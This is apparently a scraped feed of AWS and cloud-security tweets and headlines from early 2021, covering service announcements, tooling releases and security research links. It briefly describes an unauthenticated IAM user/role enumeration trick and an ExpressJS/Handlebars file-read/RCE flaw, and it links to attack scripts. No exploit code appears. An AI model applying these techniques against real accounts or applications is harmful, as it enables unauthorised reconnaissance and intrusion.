Amazon Macie announces a slew of new capabilities including support for cross-account sensitive data discovery, scanning by Amazon S3 object prefix, improved pre-scan cost estimation, and added location detail in findings • Amazon GuardDuty introduces machine learning domain reputation model to expand threat detection and improve accuracy • New IRAP report is now available on AWS Artifact for Australian customers • Over 40 services require TLS 1.2 minimum for AWS FIPS endpoints • Today I'm publishing "iamlive", a tool to generate basic <a href="https://twitter.com/hashtag/AWS" target="_blank">#AWS</a> <a href="https://twitter.com/hashtag/IAM" target="_blank">#IAM</a> policies using client-side monitoring of calls made from the AWS CLI or SDKs.🔒☁️ Try it out today and let me know if it's helpful! <a href="https://t.co/jG77E3kExz" target="_blank">github.com/iann0036/iamli…</a> • Just dropped a new AWS security tool that auto-generates your AWS AllowList SCPs based on your needs. Let me explain - a thread 🧵 • I've uncovered a way to enumerate AWS IAM users/roles without being authenticated to the victim account 😈 If you update an IAM role's trust policy to allow sts:AssumeRole from an invalid IAM principal, you'll get an "Invalid principal" error No errors if the principal is legit • For the first time AWS has publicly recommended aws-nuke as a way of handling sandbox accounts. • PSA: The AWS Architecture Icon pack has been updated: <a href="https://t.co/49N1gbfLc0" target="_blank">aws.amazon.com/architecture/i…</a> • <a href="https://twitter.com/kmcquade3" target="_blank">@kmcquade3</a> This was first discovered by <a href="https://twitter.com/dagrz" target="_blank">@dagrz</a> and presented at Kiwicon in 2016 <a href="https://t.co/9QTF93oO8d" target="_blank">youtube.com/watch?v=vxgkHJ…</a> This is a must watch series of horribly recorded videos for people doing AWS security research that unfortunately hardly anyone has seen. Script at <a href="https://t.co/GiqIJsGeXA" target="_blank">github.com/dagrz/aws_pwn/…</a> • Very happy for <a href="https://twitter.com/ajassy" target="_blank">@ajassy</a>. A fantastic leader that I have learnt a lot from. I had the pleasure of meeting him in London a few years ago. Smart, humble, approachable. Excited to see what he does for the broader Amazon. • 💣 ExpressJS + Handlebars =&gt; RCE Excellent post by <a href="https://twitter.com/0xCaptainFreak" target="_blank">@0xCaptainFreak</a> on how providing a `layout` parameter can lead to Local File Read (steal source code / env variables) or RCE 👌 example of digging into framework internals <a href="https://twitter.com/hashtag/bugbounty" target="_blank">#bugbounty</a> <a href="https://twitter.com/hashtag/bugbountytips" target="_blank">#bugbountytips</a> <a href="https://t.co/9S4CDtkB9S" target="_blank">blog.shoebpatel.com/2021/01/23/The…</a> • 🏓 Cloud Security Table Top Exercises by <a href="https://twitter.com/matthewdfuller" target="_blank">@matthewdfuller</a> Relevant scenarios to think through, including: * Malicious VPC peering request * Compromised Lambda Layers * Injected CloudFormation Templates * Broken CloudTrail Logs * + a bunch more <a href="https://t.co/URQBbG3Puj" target="_blank">matthewdf10.medium.com/cloud-security…</a> • We're looking for a Sr Pentester - a technical leader who can tackle our toughest pentests, and inspire others to do the same. If that sounds like you, lets chat! <a href="https://t.co/XC1GhqkAMC" target="_blank">apply.workable.com/j/07544F7369</a> • 🙌 Got my re:Invent swag! • Run Prowler from AWS CloudShell in seconds: <a href="https://t.co/vTeBKajDNW" target="_blank">blyx.com/2021/02/02/run…</a> <a href="https://twitter.com/hashtag/AWS" target="_blank">#AWS</a> <a href="https://twitter.com/hashtag/hardening" target="_blank">#hardening</a> <a href="https://twitter.com/hashtag/security" target="_blank">#security</a> • My favourite use for this is granting account A (e.g. secops) permission to read objects via Athena owned by account B-Y (any other accounts in the org) in a bucket owned by account Z (a no-humans-allowed logging account) This wasn't possible before without lame workarounds. • Sophia is here to show you there are still reasons to smile. • Happy St. Brigid's!!! It may not be as famous as St. Patrick's, but a holiday to celebrate the returning of spring ☘️12 years ago I visited St. Brigid's cathedral in Kildare Ireland! ☘️ • Jeff Bezos to step down as CEO, replaced by AWS CEO Andy Jassy in Q3. • Slack’s Outage on January 4th 2021 • re:Invent videos are *finally* on YouTube • iamlive a tool to generate iam policies from aws cli or SDK calls • Node.js 14.x runtime now available in AWS Lambda | Amazon Web Services • 3 new SolarWinds vulnerabilities including RCE in Orion platform • Exploiting Nespresso smart cards for fun and coffee • Cloud security business acquisitions